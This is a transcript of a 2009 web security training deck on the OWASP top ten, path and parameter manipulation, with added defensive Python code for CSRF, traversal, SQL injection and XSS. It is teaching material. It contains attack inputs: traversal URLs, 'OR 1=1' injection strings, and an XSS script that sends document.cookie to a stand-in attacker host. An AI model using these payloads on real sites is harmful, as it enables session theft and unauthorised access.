
Web Security Overview


Presentation Transcript


  1. Web Security Overview. Lohika ASC team, 2009. ad_asc@lohika.com

  2. Agenda
  • The Evolution of Web Applications (slide 3)
  • Common Web Application Functions (slide 5)
  • Server/Browser Information Flow and Vulnerabilities (slide 6)
  • The Security Aspects (slide 8)
  • Web Security Assessment Main Stages (slide 10)
  • Web Application Vulnerabilities: Top 10 (slide 14)
  • Path Manipulation Attack (slide 21)
  • Parameter Manipulation Attack (slide 25)
  • ASC Products Overview (slide 36)

  3. The Evolution of Web Applications

  4. The Evolution of Web Applications
  Rapid evolution of web applications:
  • No longer a set of static pages
  • Rely on multiple technology layers and concepts to provide interactive content
  • Replacing desktop applications in many areas
  • Used everywhere

  5. Common Web Application Functions (all potentially insecure)
  1. Social networking
  2. Shopping
  3. Auctions
  4. Web mail
  5. Banking
  6. Web logs
  7. Gambling
  8. Web search
  9. Interactive information
  Example: the MySpace Samy worm, http://namb.la/popular/tech.html

  6. Two-way information flow: Server <-> Browser
  [Diagram: the browsers of external and internal users reach the auth service, web service and HTTP servers through a firewall; the HTTP servers talk to the database; the server infrastructure forms one zone.]

  7. Two-way information flow: Server <-> Browser
  [Same diagram with vulnerability classes placed on it: Parameter Tampering, XSS and CSRF on the browser/HTTP-server boundary; Local File Include, Remote File Inclusion, XML Injection, Path Traversal, SQL Injection and Forged Token between the HTTP server and the back-end services and database.]

  8. The Security Aspect
  • In recent years, web application security has become a focal point for security experts. Application attacks are constantly on the rise, posing new risks for the organization.
  • Application security sometimes gets overlooked by Dev, QA or Operations teams for various reasons:
    • Risks involved are underestimated / not fully realized
    • Lack of competence
    • Lack of time
  • Any business that relies on a vulnerable web application is at risk of a major business impact with serious implications.

  9. The Security Aspect: this is a problem.

  10. Web Security Assessment: main stages

  11. Map the application's content

  12. Analyze the application's attack vectors
  1. Identify functionality
  2. Identify data entry points
  3. Identify technologies

  13. Attack patterns and goals

  14. Web Application Vulnerabilities: Top 10
  Injection
  • Examples of injection flaws are SQL, XML, LDAP, HTTP header injection (cookies, requests) and OS command injection
  • Attacks occur when untrusted data, such as a query, command or argument, is sent to an interpreter
  • Vulnerable applications can be tricked into executing unintended commands or allowing the attacker to access and modify data
  Cross Site Scripting
  • There are three types of XSS attacks: stored, reflected and DOM-based
  • XSS attacks occur when an application allows data that is not validated or escaped properly to be sent to a web browser
  • Malicious scripts are executed in the victim's browser, allowing the attacker to hijack the user's session, steal cookies, deface web sites, redirect users to malicious web sites and control the browser remotely

  15. Web Application Vulnerabilities: Top 10 (continued)
  Broken Authentication and Session Management
  • Users are impersonated because of leaks or flaws in the authentication process
  • Attacks occur when a session ID is exposed to others (for example in a URL), timeouts are not properly set, SSL/TLS is not used, or any other flaw in the authentication scheme is found
  • Flaws used against one account may be replicated against an account with higher privileges
  Insecure Direct Object References
  • The attack occurs when an authorized user can change a parameter value that refers to a system object they are not authorized for
  • Almost any reference reachable by URL qualifies, including references to files, paths, database keys and reflection by class name (e.g. a JDBC connector class)
  • Remote referencing includes Web Services, CORBA, RMI and RPC

  16. Web Application Vulnerabilities: Top 10 (continued)
  Cross Site Request Forgery (CSRF)
  • The attacker creates malicious code that generates a forged request and tricks the victim's browser into submitting it while the victim is logged in
  • Forged requests can be hidden in image tags, XSS payloads and a number of other techniques
  • CSRF attacks can complete any transaction the victim is permitted to perform, such as accessing data, transferring funds or making purchases
  Security Misconfiguration
  • The attacker exploits unsecured pages, default accounts, unpatched flaws or any other vulnerability that could have been addressed by proper configuration
  • These attacks can result in a complete system compromise
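  The forgery described above works because the browser attaches the victim's session cookie to any request, wherever it came from. The usual fix is a per-session anti-forgery token that the attacker's page cannot read, checked on every state-changing request. The following is an added example, not code from the slides or from Lohika; the host name bank.example, the session identifier and the three simulated requests are assumptions made for the demonstration.

```python
import hashlib
import hmac
import secrets
from typing import Optional
from urllib.parse import urlsplit

# Hypothetical values for this example: the site's own host name and a
# per-deployment secret that never leaves the server.
SITE_HOST = "bank.example"
SERVER_SECRET = secrets.token_bytes(32)


def issue_csrf_token(session_id: str) -> str:
    """Derive the anti-forgery token for a session as HMAC(secret, session id).

    The token is embedded in the site's own forms as a hidden field. A forged
    request (an <img> tag or auto-submitted form on the attacker's page) still
    carries the victim's session cookie, but the attacker's page cannot read
    the token out of the victim's session, so it cannot supply it.
    """
    return hmac.new(SERVER_SECRET, session_id.encode(), hashlib.sha256).hexdigest()


def check_csrf(session_id: str, submitted_token: Optional[str],
               origin: Optional[str]) -> bool:
    """Decide whether a state-changing request (transfer, purchase, ...) may proceed.

    Two independent checks: the submitted token must equal the session's token
    (compared in constant time), and if the browser sent an Origin header it
    must name our own host. Origin is optional because not every request
    carries it; the token check is the one that must always hold.
    """
    if not submitted_token:
        return False
    expected = issue_csrf_token(session_id)
    if not hmac.compare_digest(expected, submitted_token):
        return False
    if origin is not None and urlsplit(origin).hostname != SITE_HOST:
        return False
    return True


def demo() -> dict:
    """Constructed requests: the victim's real form post versus two forgeries."""
    victim_session = "sess-7f3a"          # value of the victim's session cookie
    token = issue_csrf_token(victim_session)
    return {
        # The site's own form: cookie + hidden token + same-site Origin.
        "legitimate": check_csrf(victim_session, token, "https://bank.example"),
        # <img src="https://bank.example/transfer?to=attacker&amount=1000">
        # on evil.example: the browser attaches the cookie, but no token.
        "forged_img": check_csrf(victim_session, None, None),
        # A hidden auto-submitting form on evil.example that guesses the token.
        "forged_form": check_csrf(victim_session, "0" * 64, "https://evil.example"),
    }


if __name__ == "__main__":
    print(demo())
```

Deriving the token from the session id keeps the server stateless, but it means the token lives exactly as long as the session; rotate the session id (and therefore the token) after login so a token captured before authentication is worthless afterwards.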

  17. Web Application Vulnerabilities: Top 10 (continued)
  Failure to Restrict URL Access
  • This attack takes place when an authorized user can simply change a URL to reach a privileged page
  • Attackers generally look for administrative functions to employ this attack on
  • Links can be obtained from hidden fields, client-side code, robots.txt, configuration files, static XML files and directory listings
  Unvalidated Redirects and Forwards
  • An unvalidated parameter lets an attacker choose the destination page a victim is sent to, in order to trick them into disclosing private information
  • Victims trust these links because the link points to a valid site

  18. Web Application Vulnerabilities: Top 10 (continued)
  Insecure Cryptographic Storage
  • The most common cause of this flaw is that data which should be encrypted is stored in cleartext
  • It can also result from poor use of encryption: home-grown algorithms, insecure use of strong algorithms or continued use of algorithms proven weak
  • Weak or unsalted hashes used to protect passwords are another common flaw that leads to this risk
  Insufficient Transport Layer Protection
  • Most commonly, the site does not use SSL/TLS for pages that require authentication, so an attacker who can monitor network traffic steals an authenticated user's session cookie
  • Poorly configured SSL certificates train users to accept warnings for legitimate sites, so they are later tricked into accepting a phishing site's certificate
  • Attacks can lead to account theft, phishing and compromised admin accounts

  19. Path Manipulation attacks and Parameter Manipulation attacks

  20. Attack Techniques
  • Two of the most dangerous and most common attack techniques are path manipulation and parameter manipulation:

  21. Path manipulation: 1. Directory indexing
  • Automatic directory listing/indexing is a web server function that lists all of the files within a requested directory.
  • The following information could be obtained from directory indexing data:
  • Note: a listing is served only when the directory has no default document (index.html, home.html, default.htm).

  22. Path manipulation: 2. Path truncation
  • Path truncation attacks are requests for known directories without file names; these may cause directory listings to be displayed.
  Example:
  1. Given the URL http://www.site.com/folder1/folder2/file.asp
  2. truncate the path to http://www.site.com/folder1/folder2/
  3. and then to http://www.site.com/folder1/
  This may cause the web server to reveal directory contents or to raise unhandled exceptions.

  23. Path manipulation: 3. Path traversal
  • These attacks are expressions in the URI that cause the web server to return the contents of files above the web root.
  Example:
  1. http://www.site.com/folder1/../../../../../../../boot.ini
  2. or http://www.site.com/getnews.php?name=../../../../../../boot.ini
  This occurs when the web application uses the supplied string to locate a file without first stripping the traversal sequences ("../") from it.
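  Stripping "../" by itself is not enough: the sequence can be URL-encoded (even twice), written with backslashes, or followed by a null byte that truncates the path in C or Perl runtimes. The check below, an added example that is not from the slides or from Lohika, resolves the requested name against a document root and refuses anything that ends up outside it. The web root /var/www/site and the sample inputs are assumptions; the two boot.ini URLs are the slide's.

```python
import posixpath
from urllib.parse import unquote

# Hypothetical document root for this example; the slides name no server layout.
WEBROOT = "/var/www/site"


class UnsafePath(ValueError):
    """Raised when a requested path would leave the web root."""


def resolve_under_webroot(requested: str, webroot: str = WEBROOT) -> str:
    """Map a URL path or file-name parameter onto a file below webroot, or raise.

    Steps, in the order an attacker tries to defeat them:
      1. Percent-decode twice, so "..%252f" (double-encoded "../") is seen as "../".
      2. Reject NUL: C and Perl runtimes truncate the path at %00, so
         "../../boot.ini%00.html" would pass an extension check yet open boot.ini.
      3. Treat backslashes as separators (Windows servers accept "..\\").
      4. Normalise "." and ".." and check the result is still inside webroot.
    """
    decoded = unquote(unquote(requested))
    if "\x00" in decoded:
        raise UnsafePath("null byte in requested path")
    decoded = decoded.replace("\\", "/")
    candidate = posixpath.normpath(posixpath.join(webroot, decoded.lstrip("/")))
    # normpath collapses "/var/www/site/../../boot.ini" to "/boot.ini", which
    # no longer has the web root as a prefix, so the traversal is caught here.
    if candidate != webroot and not candidate.startswith(webroot + "/"):
        raise UnsafePath("path escapes the web root: " + candidate)
    return candidate


def is_safe(requested: str) -> bool:
    """True if the request stays below the web root, False if it is a traversal."""
    try:
        resolve_under_webroot(requested)
        return True
    except UnsafePath:
        return False


# Constructed test inputs: the two URLs from the slide plus common variants.
SAMPLES = [
    "/folder1/folder2/file.asp",
    "folder1/../../../../../../../boot.ini",        # from the slide
    "../../../../../../boot.ini",                    # getnews.php?name=... from the slide
    "..%252f..%252f..%252fetc/passwd",               # double URL-encoded
    "..\\..\\..\\windows\\win.ini",                   # backslash separators
    "news/today.html%00.jpg",                        # null-byte truncation
]

if __name__ == "__main__":
    for sample in SAMPLES:
        print(f"{'ALLOW' if is_safe(sample) else 'BLOCK':5} {sample}")
```

The decisive check is the prefix comparison after normalisation, not the presence of ".." in the input; a deny-list of characters always misses the next encoding trick, whereas the normalised path either starts with the web root or it does not.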

  24. Path manipulation: 4. Predictable resource location / directory enumeration
  • Directory enumeration lists all directory paths and possibilities on the application server, including hidden directories that could contain sensitive information.

  25. Parameter manipulation: where are the entry points of a web application?
  • HTTP GET request query parameters
  • HTTP POST request parameters
  • HTTP cookies
  • Custom HTTP headers

  26. Parameter manipulation: 1. Abnormal input / parameter overflow
  • Abnormal input attack strings are composed of characters or values that can cause unhandled exceptions.
  • Unhandled exceptions often produce error messages that disclose sensitive information about the application's internal mechanics.
  • Source code may even be disclosed.
  Example:
  1. http://www.site.com/cgi-bin/process.pl?id=%00 (where %00 is the poisonous null byte)
  2. or http://www.site.com/cgi-bin/process.pl?id=99999999999999999 (a value larger than the receiving variable or database column can hold)

  27. Parameter manipulation: 2. Brute force authentication attack
  • A brute force attack is a method of obtaining a user's authentication credentials by trial.
  • Using brute force, attackers attempt combinations of the accepted character set in order to find the specific combination that gains access to the authorized area.

  28. Parameter manipulation: 3. SQL injection
  Simple injection with an 'OR true' construction.
  Example SQL query:
  SELECT `id`,`login`,`pass` FROM `users` WHERE login='admin' AND pass='qwert';
  • Identify whether SQL injection is possible through incorrectly filtered escape characters: this form of SQL injection occurs when user input is not filtered for escape characters and is then passed into a SQL statement. The end user of the application can then manipulate the statements executed on the database.
  Example:
  ?login=aaa'  (error returned: You have an error in your SQL syntax...)
  ?login=aaa' OR 1=1 OR 'bbb  (the "or 1=1" signature)
  Resulting SQL query:
  SELECT `id`,`login`,`pass` FROM `users` WHERE login='aaa' OR 1=1 OR 'bbb' AND pass='qwert';

  29. Parameter manipulation: 3. SQL injection

  30. Parameter manipulation: 3. SQL injection
  Example:
  1. Given the following URL: http://www.site.com/login.php?name=Vlad&password=12345
  2. After login, the message "Welcome Vlad to our site" appears on the page.
  3. What happens if the user name is the following? http://www.site.com/login.php?name=anyuser' OR 1=1 --&password=unknown
  4. The SQL query becomes: SELECT `id`,`login`,`pass` FROM `users` WHERE login='anyuser' OR 1=1 --' AND pass='unknown';
  5. Everything after -- is a comment, so the password check disappears and the WHERE clause is true for every row: you are logged in without a password, as whichever user the first returned row belongs to.
  Also try as the user name: <script>alert(document.cookie);</script>' or true#
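  The three slides above (the quote probe, the 'OR 1=1' signature and the -- comment bypass) can be reproduced against a throwaway SQLite database. This is an added example, not code from the slides or from Lohika; the users table is constructed here, with an extra "admin" row before "Vlad" as an assumption, to show that the bypass logs the attacker in as the first row the database returns, which is usually the most privileged account, not "anyuser".

```python
import sqlite3
from typing import Optional


def make_db() -> sqlite3.Connection:
    """Constructed sample data shaped like the slide's users table.

    Passwords are stored in cleartext only to mirror the slide; a real
    application stores salted hashes.
    """
    conn = sqlite3.connect(":memory:")
    conn.execute("CREATE TABLE users (id INTEGER PRIMARY KEY, login TEXT, pass TEXT)")
    conn.executemany("INSERT INTO users (login, pass) VALUES (?, ?)",
                     [("admin", "qwert"), ("Vlad", "12345")])
    conn.commit()
    return conn


def login_vulnerable(conn: sqlite3.Connection, name: str, password: str) -> Optional[str]:
    """The slide's query built by string concatenation: the parameters become SQL."""
    sql = ("SELECT id, login, pass FROM users "
           f"WHERE login='{name}' AND pass='{password}'")
    row = conn.execute(sql).fetchone()
    return row[1] if row else None


def login_safe(conn: sqlite3.Connection, name: str, password: str) -> Optional[str]:
    """Same query with bound parameters: the driver sends the values separately
    from the statement text, so a quote in the input can never end the literal."""
    sql = "SELECT id, login, pass FROM users WHERE login=? AND pass=?"
    row = conn.execute(sql, (name, password)).fetchone()
    return row[1] if row else None


def quote_probe_errors(conn: sqlite3.Connection) -> bool:
    """Step 1 of the slide: send a lone single quote and see if the database
    complains. A syntax error leaking back is the classic injection indicator."""
    try:
        login_vulnerable(conn, "aaa'", "x")
        return False
    except sqlite3.OperationalError:
        return True


if __name__ == "__main__":
    db = make_db()
    payload = "anyuser' OR 1=1 --"
    print("probe raises SQL error:", quote_probe_errors(db))
    print("vulnerable login as:", login_vulnerable(db, payload, "unknown"))
    print("parameterised login as:", login_safe(db, payload, "unknown"))
    print("real credentials still work:", login_safe(db, "Vlad", "12345"))
```

Note that the parameterised version does not escape or filter anything; it never lets the input reach the SQL parser as code, which is why it also defeats the 'bbb variant from slide 28 without special handling.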

  31. Parameter manipulation: 5. Cross Site Scripting
  Cross-site scripting (XSS) is a type of vulnerability, typically found in web applications, that allows malicious web users to inject code into the web pages viewed by other users.

  32. Parameter manipulation: 5. Cross Site Scripting
  Simple XSS attack. Request: http://myserver.com/test.jsp?name=Stefan
  Example response:
  <HTML> <Body> Welcome Stefan </Body> </HTML>

  33. Parameter manipulation: 5. Cross Site Scripting
  Request: http://myserver.com/welcome.jsp?name=<script>alert("Attacked")</script>
  Response:
  <HTML> <Body> Welcome <script>alert("Attacked")</script> </Body> </HTML>

  34. Parameter manipulation: 5. Cross Site Scripting
  Example:
  6. Try to log in under the following user name: http://www.site.com/login.php?name=<script>alert(111);</script>' OR '1=1#&password=…
  7. After login, the message "Welcome <script>alert(111);</script>' OR '1=1# to our site" appears in the HTML source of the page. As a result, a popup message box showing "111" appears: it is XSS!
  8. What happens if the user name is the following? <script>alert(document.cookie);</script>' OR ='1
  9. And what happens if the user name is the following? <script>document.writeln("<img src=http://myhackersite.com/?a=" + document.cookie + ">");</script>' OR 1=1#
  (The injected script makes the victim's browser send the session cookie to the attacker's server.)
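  Slides 31 to 34 show the parameter being copied straight into the page. The fix is output encoding for the context the value lands in, plus an HttpOnly session cookie so that the document.cookie payload above has nothing to steal. The following is an added example, not code from the slides or from Lohika; the page templates are reduced to Python f-strings, the payloads are taken from the slides, and the cookie name SESSIONID is an assumption.

```python
import html
import re

# Pattern used only to classify rendered output in this example.
SCRIPT_TAG = re.compile(r"<\s*script\b", re.IGNORECASE)


def render_welcome_vulnerable(name: str) -> str:
    """The slide's welcome.jsp behaviour: the parameter is copied into the page as-is."""
    return f"<html><body>Welcome {name}</body></html>"


def render_welcome_escaped(name: str) -> str:
    """Same page with HTML-entity escaping: '<' becomes '&lt;', so the browser
    shows the payload as text instead of parsing it as a script element."""
    return f"<html><body>Welcome {html.escape(name, quote=True)}</body></html>"


def render_attribute_escaped(name: str) -> str:
    """Attribute context needs the quotes escaped too (quote=True); otherwise a
    value such as   " onmouseover="alert(1)   breaks out of the attribute."""
    return f'<input type="text" name="user" value="{html.escape(name, quote=True)}">'


def session_cookie_header(session_id: str) -> str:
    """Defence in depth against the document.cookie theft on the slide: an
    HttpOnly cookie is still sent by the browser but is not exposed to scripts."""
    return f"Set-Cookie: SESSIONID={session_id}; Path=/; Secure; HttpOnly"


def executes_script(markup: str) -> bool:
    """Crude check: does the rendered page still contain a live <script> tag?"""
    return bool(SCRIPT_TAG.search(markup))


# Constructed payloads, following the slides' examples.
PAYLOADS = {
    "alert": '<script>alert("Attacked")</script>',
    "cookie_exfil": '<script>document.writeln("<img src=http://myhackersite.com/?a="'
                    ' + document.cookie + ">");</script>',
    "attr_breakout": '" onmouseover="alert(1)',
}

if __name__ == "__main__":
    for label, payload in PAYLOADS.items():
        print(label,
              "vulnerable:", executes_script(render_welcome_vulnerable(payload)),
              "escaped:", executes_script(render_welcome_escaped(payload)))
    print(render_attribute_escaped(PAYLOADS["attr_breakout"]))
    print(session_cookie_header("abc123"))
```

Entity escaping is correct for text and attribute values; a value placed inside a JavaScript block or a URL needs the encoding for that context instead, which is why the escaping belongs in the template at the point of output rather than in a single filter on input.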

  35. ASC Products Overview

  36. Application Security Center product overview: WebInspect, QAInspect, Assessment Management Platform (AMP)

  37. Application Security Center product overview: the entire suite

  38. Q & A
